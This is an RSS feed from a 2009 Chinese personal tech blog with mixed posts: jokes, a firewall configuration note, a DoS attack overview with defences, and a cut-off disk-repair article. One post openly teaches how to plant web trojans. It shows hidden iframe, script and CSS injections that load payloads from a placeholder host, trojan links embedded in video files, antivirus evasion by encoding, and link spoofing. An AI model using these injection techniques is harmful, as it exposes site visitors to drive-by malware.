<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[anti-security]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[潘宏成的技术博客！有些东西，要记录下来才能回忆！]]></description>
<link>http://hi.baidu.com/panhc007</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[遭遇肥皂电视剧的狗血台词和场景......]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/3aed619b183a86bfc9eaf481.html]]></link>
        <description><![CDATA[
		
		<p><span><font size="3">1．今天坐地铁，从建国门站上来一男一女，坐在我的旁边<br>
女：&ldquo;她其实心里很伤，本就是那种容易痛的女子&rdquo;<br>
男：&ldquo;她还没释怀么&rdquo;<br>
然后我起身，哆哆嗦嗦泪流满面的离开了</font></span></p>
<p><span><br>
<font size="3">2．女：我喜欢在街头喝咖啡，人来人往的，觉得像公主一样备受瞩目。<br>
男：呵，你本就是让人给予三千宠爱的女子。<br>
当时把我雷的45度明媚、忧愁望天、内牛满面......</font></span></p>
<p><span><br>
<font size="3">3．在苏州吃饭 旁边俩大爷喝小酒吃下酒菜 两人的坐姿均为右腿蜷起來把右脚踩在椅子上突然大爷甲说：她说出这样子的话，已经深深地伤到了我内心最深处的脆弱。。<br>
当时我就斯巴达了。。</font></span></p>
<p><span><br>
<font size="3">4．我们校园有一极像马景涛的男人以同女友吵架:<br>
他给她一嘴巴子：你滚！<br>
她掩面而泣：我不！<br>
他：滚<br>
她：不<br>
他：草（转身而去）<br>
她一把搂住他<br>
他：以后别这样，别这样（回身泪流满面的说。。。）</font></span></p>
<p><span><br>
<font size="3">5．上回吃早餐～看见一对叔叔阿姨<br>
蜀黍忽然刮了一下阿姨鼻子说&ldquo;你怎么这么纯情～～～&rdquo;<br>
阿姨羞涩地笑了。。。<br>
..................................我汤泼出来了.........</font></span></p>
<p><span><br>
<font size="3">6．无意间加了个人上来跟我打招呼，说：喜欢 &quot;最天使&quot; 么？<br>
我没反应过来呢, 人又说了：这么多年来，这是第一首能进入我心里的歌，</font></span></p>
<p><span><font size="3">不知你是否也一样～<br>
我哆哆嗦嗦的拉黑了～</font></span></p>
<p><span><br>
<font size="3">7。我们宿舍一非主流女半夜跟她汉子打电话：</font></span></p>
<p><span><font size="3">（她那晚耳朵过敏，开的免提，还以为我们仨都睡了，其实我在偷听。。。）<br>
女：平淡流年，我们经历得起吗？<br>
男：干什么？你想分手？<br>
女：悲伤逆流成河,我为谁而不顾？<br>
男：我cao！难不成是我？<br>
我憋笑差点内伤</font></span></p>
<p><span><br>
<font size="3">8。公车上<br>
男：你哪人啊？<br>
女：四川<br>
男：那你是蜀国人啊，我是楚国人啊<br>
</font></span></p>
<p><span><br>
<font size="3">9。其实最装逼的莫过于那天我和同学聊挫折她突然来了一句：其实咱们都是受伤的小兽，独自躲在角落舔伤口。<br>
我靠，当时我脸色刷的就白了，你丫牛，把我从内伤直接雷为残废了</font></span></p>
<p><span><br>
<font size="3">10。某经过学校黑暗角落．闻争吵之声,循声望去,见一男一女．<br>
男:你听我解释<br>
女:我不听我不听,你让我走!<br>
男:你不要走,你听我解释此时拉住女手<br>
女:放开我!你这个疯子．猛烈转身就要走．<br>
此时,男一把将女子拉入怀中,既而强吻上．女挣扎数秒,逐双臂环住男脖子．<br>
我默默路过．．．同时寻找摄象机．未果．</font></span></p>
<p><span><br>
<font size="3">11。某节课一装B男噌的站起来…<br>
老师：XXX!你站起来干嘛<br>
B男：有人在后门看我<br>
老师：看你怎么了<br>
B男：我爸让我注意点！怕人绑架我！我可值好几千万呢<br>
全班都45度的面瘫了…全都嘴上呵呵心里MLGB了</font></span></p>
<p><span><br>
<font size="3">12。在星巴克 我点着一杯卡布基诺 在这群安静的装逼侠对我侧目的时候华丽的打开我的橘子iphone刹那间 整个星巴克被一首高亢而又悲凉的《月亮之上》所笼罩 顿时 那些星巴克里面的装逼侠们 开始&ldquo;内蒙古牛肉拉满面&rdquo;</font></span></p>
<p><span><br>
<font size="3">13。讲一个90后小姑娘追我朋友的事。一90后的小姑娘。打扮不非主流。也挺水灵。我朋友不要。我们很不解。我朋友说沟通无能。</font></span></p>
<p><span><font size="3">当下。我朋友拒绝小姑娘的时候我们都在。朋友估计小姑娘的自尊心比较脆弱，拒绝的那叫一个曲折委婉。后来小姑娘终于明白了。幽幽的看着我朋友，朱唇轻启，扔了句：<br>
&ldquo;告诉我。这个冬天为什么特别寒冷？&rdquo;就走了。</font></span></p>
<p><span><font size="3">众人终于明白何谓沟通不能。顿时内牛满面……</font></span></p>
<p><span><br>
<font size="3">14。晚上，某教学楼五楼。一男一女。在闹分手。男的背对女的，女的欲哭，已经在绞衣服角。男人此时说：我们分手吧。<br>
女的没有说话，只是满含泪光地看着男的。<br>
男的此时已经转过头来了，看见女的如此，然后像走猫步一样走过去抱住女的说：哈儿，我从舍得。（傻瓜，我怎么舍得）</font></span></p>
<p><span><br>
<font size="3">15。惹到一文艺系的小男生，某日在我拒接他电话N次后，发以短信：&ldquo;我的忧伤是与生俱来又不可磨灭的。大概任何人都无法化解，我只期盼上帝可以带走我和我的悲伤，只有他可以·····&rdquo;</font></span></p>
<p><span><br>
<font size="3">16。某天 公交车上 上来两背着蛇皮袋的头发油腻男子 我前面入座<br>
A:  兄弟，我还是爱他的 ，只是我是个浪子，浪子你懂不？</font></span><span><br>
<font size="3">B：我懂，我深深的明白你的忧伤。<br>
A：你不懂，我 天生是个四处漂泊的浪子，好像那浮萍一样.....无拘无束.....<br>
司机没刹车，但车上顿时倒下了一帮人。。。<br>
</font></span></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BE%AD%B5%E4%D3%EF%C2%BC%28%D0%A6%BB%B0%29">经典语录(笑话)</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/3aed619b183a86bfc9eaf481.html#comment">查看评论</a>]]></description>
        <pubDate>2009-12-01  10:01</pubDate>
        <category><![CDATA[经典语录(笑话)]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/3aed619b183a86bfc9eaf481.html</guid>
</item>

<item>
        <title><![CDATA[挂马的N种方法]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/b2355dfa52f3f79d58ee90d6.html]]></link>
        <description><![CDATA[
		
		<p><font size="3">1) HTML挂马法。<br>
常规的HTML挂马方法一般是在网页中插入一条iframe语句，像&lt;iframe src=http://www.xxx.com/horse.html width=0 height=0&gt;&lt;/iframe&gt;。查看站点是否被挂，一般是查找一下关键词iframe。<br>
(2) 再隐藏一点的就是js挂马了。<br>
像再原来的网页中写入&lt;script str=http://www.xxx.com/horse.js&gt;&lt;/script&gt;，horse里的js写法一般为 document.write('http:\/\/www.xxx.com\/horse.html'&gt;;，或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + '\r\n&lt;inframe src=&quot;<a href="http://www.xxx.com/horse.htm/%22%3E%3C/iframe%3E%20"><span style="font-size: medium;"><font color="#0179a5">http://www.xxx.com/horse.htm/&quot;&gt;&lt;/iframe&gt;'</font></span></a><span style="font-size: medium;">;。不过第2种写法要注意：是原来的网页种要有body标签。<br>
(3) 在 css中挂马。<br>
这个方法就是在css中写入：<br>
body {<br>
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + '\r\n&lt;iframe src=&quot;</span><a href="http://www.xxx.com/horse.html/%22%3E%3C/iframe%3E%20"><span style="font-size: medium;"><font color="#0179a5">http://www.xxx.com/horse.html/&quot;&gt;&lt;/iframe&gt;'</font></span></a><span style="font-size: medium;">);<br>
}<br>
然后在主页中调用这个CSS，代码类似&lt;link href=&quot;</span><a href="http://www.7747.net/css.css"><span style="font-size: medium;"><font color="#0179a5">http://www.7747.net/css.css</font></span></a><span style="font-size: medium;">&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot;&gt;这样的。在csdn 中对expression的解释是：IE5及其以后版本支持在CSS中使用expression，用来吧CSS属性和Javascript表达式关联起 来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式，CSS属性的值等于 Javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法，也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个 成员函数中一样。整个解释关键点是expression可以在css中引入js语句，所以我们可用于挂马。不过写的语句值可以远程调用，本地不可以。<br>
(4) 在swf中挂马<br>
网上有一些swf挂马的工具，可以用工具替换原来网页中的swf或单独把swf发给对方，一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为：<br>
&lt;OBJECT classid=clsid27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high&gt; &lt;EMBED src=&quot;</span><a href="http://www.7747.net/xxx.swf"><span style="font-size: medium;"><font color="#0179a5">http://www.7747.net/xxx.swf</font></span></a><span style="font-size: medium;">&quot; quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60&gt;&lt;/EMBED&gt;&lt;/OBJECT&gt;<br>
(5) 在影音文件中挂马。<br>
所需工具是RealMedia Editor，打开工具后，然后依次选择“文件”－“打开Real媒体文件”，然后选择需要编辑的视频文件，其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着，新建一个文本，在里面输入u 00:00:10:0 00:00:30.0&amp;_rpexternal&amp;&amp;http://www.xxx.com/horse.htm<br>
(00:00:10.0就是发生第一事件的时间，这里是让计算机弹出网页；00:00:30.0同样，这是第二次发生的时间，在0时0分第30秒0微妙时弹出窗口；而后面的URL地址就是连接指定的木马地址。)<br>
输入完毕后并保存，然后依次选择“工具”－“合并事件”，导入刚才的文本。当合并完成后，依次选择“文本”－“Real文件另存为”，保存好即可。<br>
最后把生成的视频文件发布网上，当对方观看同时就会连接到你指定的木马地址。</span></font></p>
<p><font size="3"> </font></p>
<font size="3"><span style="font-size: medium;">2，挂马的技巧<br>
挂马首先要求的是隐蔽性，这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了，但是还可再用到些技巧。<br>
(1)远程任意后缀执行HTML<br>
可以把horse.html改成horse.jpg之类的后缀，然后语句写成&lt;iframe src=/article/UploadPic/2009-3/200931244554352.jpg width=0 height=0&gt;&lt;/iframe&gt;。js也可以，语句为&lt;script src=/article/UploadPic/2009-3/200931244554352.jpg&gt;&lt;/script&gt;，甚至 js的不要后缀名都可以。<br>
(2)JS的加密<br>
为了保护网页木马的代码，可以把JS内容加密，还能躲开杀软的作用。如果使用ENCODE加密方式，加密后的JS调用语句就 用&lt;scriptlanguage=&quot;jscript&quot;.encode&quot;src=http://www.xxx.com/horse.txt&amp; gt;&lt;/script&gt;。除此方法外，还有其它更多的方法！<br>
(3)URL的变形<br>
URL的变形方法也有很多，例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了，不过多数的URL欺骗，像利用@的技巧，IE都已经打补丁了。但现在有个漏洞仍然有效，代码如下：<br>
&lt;a id=&quot;CZY&quot; href=&quot;</span><a href="http://www.baidu.com%22%3e%3c/a"><span style="font-size: medium;"><font color="#0179a5">http://www.baidu.com&quot;&gt;&lt;/a</font></span></a><span style="font-size: medium;">&gt;<br>
&lt;div&gt;<br>
&lt;a href=&quot;</span><a href="http://www.google.cn/"><span style="font-size: medium;"><font color="#0179a5">http://www.google.cn</font></span></a><span style="font-size: medium;">&quot; target=&quot;_blank&quot;&gt;<br>
&lt;table&gt;<br>
&lt;caption&gt;<br>
&lt;a href=&quot;</span><a href="http://www.google.cn/"><span style="font-size: medium;"><font color="#0179a5">http://www.google.cn</font></span></a><span style="font-size: medium;">&quot; target=&quot;_blank&quot;&gt;<br>
&lt;label for=&quot;CZY&quot;&gt;<br>
&lt;u style=&quot;cursor: pointer: color: blue&quot;&gt;<br>
Google&lt;/u&gt;<br>
&lt;/label&gt;&lt;/a&gt;&lt;/caption&gt;&lt;/table&gt;&lt;/a&gt;&lt;/div&gt;<br>
保存该代码为网页后，鼠标移动到Google这个链接上时，IE状态栏显示的是</span><a href="http://www.google.cn/"><span style="font-size: medium;"><font color="#0179a5">http://www.google.cn</font></span></a><span style="font-size: medium;">，但点击链接后却打开</span><a href="http://www.baidu.com/"><span style="font-size: medium;"><font color="#0179a5">http://www.baidu.com</font></span></a><span style="font-size: medium;">网 站。如果你的网马可以用IP地址访问到的话，IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为2130706433、 0x7f.0x00.0x00.0x01、0177.0000.0000.0001等等，这只不过是8进制、10进制、16进制、的转换而已。</span></font> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/Hacker%20Information">Hacker Information</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/b2355dfa52f3f79d58ee90d6.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-27  09:16</pubDate>
        <category><![CDATA[Hacker Information]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/b2355dfa52f3f79d58ee90d6.html</guid>
</item>

<item>
        <title><![CDATA[网络攻击概述]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/d124a90333ae1982d53f7cab.html]]></link>
        <description><![CDATA[
		
		<h1>Smurf攻击</h1>
<font size="4">Smurf攻击是以最初发动这种攻击的程序名“Smurf”来命名的。这种攻击方法结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系 统，引起目标系统拒绝为正常系统进行服务。Smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包，来淹没受害 主机，最终导致该网络的所有主机都对此ICMP应答请求做出答复，导致网络阻塞。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方崩溃。</font><br>
<br>
<br>
++++++++++++++++++++++++++++++++++++<br>
<h1>Fraggle攻击</h1>
<font size="4"><strong>Fraggle攻击</strong>对<a target="_blank" href="http://baike.baidu.com/view/502685.htm">Smurf攻击</a>作了简单的修改，使用的是<a target="_blank" href="http://baike.baidu.com/view/30509.htm">UDP</a>应答消息而非<a target="_blank" href="http://baike.baidu.com/view/30564.htm">ICMP</a>。<br>
防御：在<a target="_blank" href="http://baike.baidu.com/view/3067.htm">防火墙</a>上过滤掉UDP应答消息。<br>
已CISCO的ASA为例 <br>
class-map fraggle -------------定义端口号和协议号<br>
match port udp eq echo<br>
policy-map fraggle --------------策略匹配,设置最大连接数为1<br>
class fraggle<br>
set connection conn-max 1<br>
service-policy fraggle interface inside ----------------在接口上应用</font><br>
++++++++++++++++++++++++++++++++++++<br>
<h1>land攻击</h1>
<font size="4"><strong>land 攻击</strong>是一种使用相同的源和目的主机和端口发送数据包到某台机器的攻击。结果通常使存在漏洞的机器崩溃。<br>
在Land攻击中，一个特别打造的<a target="_blank" href="http://baike.baidu.com/view/488528.htm">SYN</a>包中的源地址和目标地址都被设置成某一个服务器地址，这时将导致接受服务器向它自己的地址发送SYN一ACK消息，结果这个地址又发回ACK消息并创建一个空连接，每一个这样的连接都将保留直到超时掉。对Land攻击反应不同，许多<a target="_blank" href="http://baike.baidu.com/view/8095.htm">UNIX</a>实现将崩溃，而 <a target="_blank" href="http://baike.baidu.com/view/41346.htm">Windows NT </a>会变的极其缓慢（大约持续五分钟）。</font> <br>
++++++++++++++++++++++++++++++++++++++++++++++++<br>
<h1>WinNuke攻击</h1>
<font size="4">　WinNuke攻击是一种拒绝服务攻击。<br>
攻击特征：WinNuke攻击又称带外传输攻击，它的特征是攻击目标端口，被攻击的目标端口通常是139、138、137、113、53，而且URG位设为“1”，即紧急模式。<br>
检测方法：判断数据包目标端口是否为139、138、137等，并判断URG位是否为“1”。<br>
反攻击方法：适当配置防火墙设备或过滤路由器就可以防止这种攻击手段（丢弃该数据包），并对这种攻击进行审计（记录事件发生的时间，源主机和目标主机的MAC地址和IP地址MAC）。</font>   <br>
++++++++++++++++++++++++++++++++++++++++++++++++++<br>
<h1>Teardrop攻击</h1>
<font size="4">Teardrop攻击是一种拒绝服务攻击。<br>
攻击特征：Teardrop是基于UDP的病态分片数据包的攻击方法，其工作原理是向被攻击者 发送多个分片的IP包（IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息），某些操作系统收到含有重叠偏移的伪造分片数据包时 将会出现系统崩溃、重启等现象。（利用UDP包重组时重叠偏移（假设数据包中第二片IP包的偏移量小于第一片结束的位移，而且算上第二片IP包的 Data，也未超过第一片的尾部，这就是重叠现象。）的漏洞对系统主机发动拒绝服务攻击，最终导致主机菪掉；对于Windows系统会导致蓝屏死机，并显 示STOP 0x0000000A错误。）<br>
检测方法：对接收到的分片数据包进行分析，计算数据包的片偏移量（Offset）是否有误。<br>
反攻击方法：添加系统补丁程序，丢弃收到的病态分片数据包并对这种攻击进行审计。<br>
++++++++++++++++++++++++++++<br>
</font>
<h1>Tiny Fragment</h1>
<font size="4"><strong>Tiny Fragment</strong><br>
字面意思为“小片段”，在网络是一种常见的攻击手段，常见于局域网。<br>
就是用一个很小的 TCP 碎片将第一个 TCP 数据包的头信息压到下一个碎片中。这可导致过滤网络通信的路由器忽略可能包含恶意数据的后续碎片。<br>
现有的TCP/IP 协议里，在输出数据包中加入一个异常的小型数据段是有可能的。如果数据段足够的小，并且可以把 TCP 数据包中的一些头部信息域压成第二个数据段，用于说明那些领域的过滤规则将与之不再匹配。如果在过滤中不能执行极小数据段，其非法的数据包将可能通过，因 为它已与过滤规则无法匹配。每个网络模式必须能够转寄 68octets 的数据报，而无需进一步的分割。这是因为一个网络头部信息可能高达 60octets，而最小的数据段仅为 8octets</font>   。<br>
+++++++++++++++++++++++++++++++++++++++++++=<br>
<h1>IPSpoofing攻击</h1>
<font size="4">　特点：地址仿冒，伪造IP地址发送报文<br>
属于单包攻击范围</font> <br>
+++++++++++++++++++++++++++++++++++++++++++++<br>
<h1>UDP洪水</h1>
<font size="4">（UDP flood）<br>
各种各样的假冒攻击利用简单的<a href="http://baike.baidu.com/view/7729.htm" target="_blank">TCP/IP</a>服务，如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间的足够多的无用数据流，如果足够多的数据流就会导致带宽的服务攻击。<br>
防御：关掉不必要的TCP/IP服务，或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。</font>  <br>
++++++++++++++++++++++++++++++++++++++++++++++++<br>
<h1>syn flood</h1>
<font size="3">SYN Flood是当前最流行的DoS（拒绝服务攻击）与DdoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式。<br>
要明白这种攻击的基本原理，还是要从TCP连接建立的过程开始说起：<br>
大家都知道，TCP与UDP不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据，必须先建立一个虚拟电路，也就是TCP连接，建立TCP连接的标准过程是这样的：<br>
首先，请求端（客户端）发送一个包含SYN标志的TCP报文，SYN即同步（Synchronize），同步报文会指明客户端使用的端口以及TCP连接的初始序号；<br>
第二步，服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认（Acknowledgment）。<br>
第三步，客户端也返回一个确认报文ACK给服务器端，同样TCP序列号被加一，到此一个TCP连接完成。<br>
以上的连接过程在TCP协议中被称为三次握手（Three-way Handshake）。<br>
问题就出在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线， 那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送 SYN+ACK给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级（大约为30秒-2分钟）；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如 果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接，即使是简单的保存并遍历 也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往 往是堆栈溢出崩溃---即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求（毕竟客户端的正常请求比 率非常之小），此时从正常客户的角度看来，服务器失去响应，这种情况我们称作：服务器端受到了SYN Flood攻击（SYN洪水攻击）。<br>
从防御角度来说，有几种简单的解决方法：<br>
第一种是缩短SYN Timeout时间，由于SYN Flood攻击的效果取决于服务器上保持的SYN半连接数，这个值=SYN攻击的频度 x SYN Timeout，所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间，例如设置为20秒以下（过低的SYN Timeout设置可能会影响客户的正常访问），可以成倍的降低服务器的负荷。<br>
第二种方法是设置SYN Cookie，就是给每一个请求连接的IP地址分配一个Cookie，如果短时间内连续受到某个IP的重复SYN报文，就认定是受到了攻击，以后从这个IP地址来的包会被丢弃。<br>
可是上述的两种方法只能对付比较原始的SYN Flood攻击，缩短SYN Timeout时间仅在对方攻击频度不高的情况下生效，SYN Cookie更依赖于对方使用真实的IP地址，如果攻击者以数万/秒的速度发送SYN报文，同时利用SOCK_RAW随机改写IP报文中的源地址，以上的 方法将毫无用武之地。</font> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/Hacker%20Information">Hacker Information</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/d124a90333ae1982d53f7cab.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-26  15:02</pubDate>
        <category><![CDATA[Hacker Information]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/d124a90333ae1982d53f7cab.html</guid>
</item>

<item>
        <title><![CDATA[2012必备逃生指南]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/e0c6eb0971d4392e6a60fbff.html]]></link>
        <description><![CDATA[
		
		<font size="4">关于2012年12月21日世界毁灭一说总是争议不断，众说纷纭。《2012》这部电影不仅向我们展示了2012世界如何毁灭了，更是一本每人必备的世界 末日逃生指南。所以不管你信不信，在接下来的3年时间内尽量一一达标完成吧，以防万一也不错^^哈哈。&#160;<br>
<br>
<br>
1，要学会开 车。 当然不止在你家小区开开或是上班下班开开，而是要像《2012》男主角一样能够把轿车跑车甚至破烂的拖车当作越野飞车来开。请务必学会此项技能，如果未能 如愿达标，那就赶快跟身边会开飞车的人拉拢关系吧。&#160;<br>
<br>
2，要学会开各种飞机。但是不需要过于“专业化”，如片中的继父那样学过一丁点 就好。飞机类型能够越多越好，如果未能如愿达标，那也请赶快巴结身边会开飞机的熟人。&#160;<br>
<br>
3，接下来的三年请务必留意广播中的怪异电 台，如果提到关于政府阴谋和世界末日的内容，需速速与该播音员联系，就算他在荒郊野外密林深处也要找到他，或许能得到意想不到的线索。&#160;<br>
<br>
4，  当然你也可以尽快认识一个地质学家天文学家等科学家，如果关系足够好或许你能从他那里获取第一手资料和信息。&#160;<br>
<br>
5，尽量学习多种语 言，求救之时以便沟通，特别是藏语。&#160;<br>
<br>
6，通过各种途径提高你的知名度，就像片中男主角兼职作家一样，在危急关头或许能被你的 FANS认出救你一命。&#160;<br>
<br>
7，购置一部好手机，虽然平时它经常收不到信号，但在世界末日的最后关头它会带给你巨大惊喜：就算全世界几 乎被毁灭殆尽了，你仍然有可能用手机拨通千里迢迢之外或大洋彼岸朋友的电话然后来一段生离死别催人泪下的告白，例如片中地质科学家在西藏的雪山上接到了朋 友从印度打来的临终电话。&#160;<br>
<br>
8，在关系到生死存亡的时刻，除了家人和西藏人，谁都不能相信。如果可以，尽快交个西藏朋友，如果是个技 术工人更佳。&#160;<br>
<br>
9，没事不要待在海上；尽早搬离岛国，沿海城市，地震断裂带和火山地区；没事就去喜马拉雅山上待着，有可能你根本不用 逃生就能活下来。&#160;<br>
<br>
10，锻炼身体。能够应付天寒地冻的环境，水性要足够好。多多跑步，最好是能追上正在起飞的飞机。&#160;<br>
<br>
11，  如果地陷，浓烟和火光在你身后追逐你，或者你开的汽车飞机面临可能逾越不过的障碍物，请一定要相信自己，咬紧牙挂闭上眼睛使劲向前冲，你会成功化解危机 的。&#160;<br>
<br>
12，如果有个工作招聘关于去喜马拉雅山脉修建东西，尽力争取到此工作。</font> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BE%AB%C6%B7%CE%C4%D5%C2">精品文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/e0c6eb0971d4392e6a60fbff.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-26  13:54</pubDate>
        <category><![CDATA[精品文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/e0c6eb0971d4392e6a60fbff.html</guid>
</item>

<item>
        <title><![CDATA[H3C secpath防火墙透明模式特性]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/507e8c3376821e49ad4b5f9f.html]]></link>
        <description><![CDATA[
		
		<p><font size="4"><strong>『功能说明』：</strong><br>
当<a href=":;" target="_self"><u><strong>防火墙</strong></u></a>工作在透明<a href=":;" target="_self"><u><strong>模式</strong></u></a>时，防火墙表现为透明网桥，但防火墙和网桥存在不同，因为防火墙收到IP报文后，会到上层进行相关过滤处理，此外还可防攻击检查，如ACL规则检查、ASPF状态过滤、防攻击检查、流量监控等功能。而网桥是不行的。</font></p>
<p><font size="4"><strong>『配置实例』：<br>
</strong>1．配置防火墙工作在透明模式：（必配）<br>
[Secpath]firewall mode transparent</font></p>
<p><font size="4">2．配置防火墙的管理IP地址，此地址可用在TELNET、SNMP等<a href=":;" target="_self"><u><strong>管理</strong></u></a>中。<br>
[Secpath]firewall system-ip 192.168.1.1 255.255.255.0</font></p>
<p><font size="4">3．配置防火墙对未知目的MAC地址的IP报文的处理方式。默认情况单播采用“arp”方式处理，广播和组播都是采“drop”方式处理。<br>
[Secpath]firewall unknown-mac flood</font></p>
<p><font size="4">4．配置其它参数，请参考手册。</font></p>
<font size="4"><strong>『注意事项』：<br>
</strong>1、当透明模式防火墙在某接口接收到广播帧或多播帧时，会向其它接口进行转发。（查找MAC地址表成功后，转发）<br>
2、在同一个物理网段上，透明模式防火墙对此帧进行过滤，不转发该帧。（查找MAC地址表成功后，不转发）<br>
3、目的未知的MAC地址帧，透明模式防火墙会向除发送该帧的源接口外的其它所有接口进行转发。（查找MAC地址表失败后，转发）<br>
4、基于MAC地址的访问控制列表，只能在透明模式下配置。<br>
5、在透明模式下，MAC地址表老化的时间是300秒。</font> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/huawei%CD%F8%C2%E7%BC%BC%CA%F5">huawei网络技术</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/507e8c3376821e49ad4b5f9f.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-26  10:23</pubDate>
        <category><![CDATA[huawei网络技术]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/507e8c3376821e49ad4b5f9f.html</guid>
</item>

<item>
        <title><![CDATA[硬盘坏道修复]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/4722e7fb507caa284e4aea2a.html]]></link>
        <description><![CDATA[
		
		<span class="Apple-style-span" style="word-spacing: 0px; font: medium Simsun; text-transform: none; color: rgb(0,0,0); text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px"><span class="Apple-style-span" style="font-size: 14px; color: rgb(98,91,73); line-height: 20px;  webkit-border-horizontal-spacing: 2px; webkit-border-vertical-spacing: 2px"><font size="3">硬盘使用久了，便有可能出现各种各样的问题，而硬盘&ldquo;坏道&rdquo;是这其中最常见的问题。如果在保换保修期内，你可将硬盘拿到销售商出处更换，而过了三保期又该怎么办呢？下面是笔者维修维护硬盘的一些方法，希望能对你维修硬盘有所帮助。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">一、硬盘出现坏道的先兆<span class="Apple-converted-space"> </span></strong><br style="line-height: normal">
硬盘坏道分为逻辑坏道和物理坏道两种，前者为软坏道，通常为软件操作或使用不当造成的，可用软件修复；后者为真正的物理性坏道，它表明你的硬盘磁道上产生了物理损伤，只能通过更改硬盘分区或扇区的使用情况来解决。出现下列情况也许你的硬盘有坏道了：<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
首先，你在打开、运行或拷贝某个文件时硬盘出现操作速度变慢，且有可能长时间操作还不成功或表现为长时间死&ldquo;啃&rdquo;某一区域或同时出现硬盘读盘异响，或干脆Windows系统提示&ldquo;无法读取或写入该文件&rdquo;，这些都可表明你的硬盘某部分出现了坏道。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
其次，每次开机时，Scandisk磁盘程序自动运行，肯定表明你的硬盘上有需要修复的重要错误，比如坏道。你在运行该程序时如不能顺利通过，表明硬盘肯定有坏道。当然，扫描虽然也可通过，但出现红色的&ldquo;B&rdquo;标记，表明其也有坏道。<span class="Apple-converted-space"> </span><br style="line-height: normal">
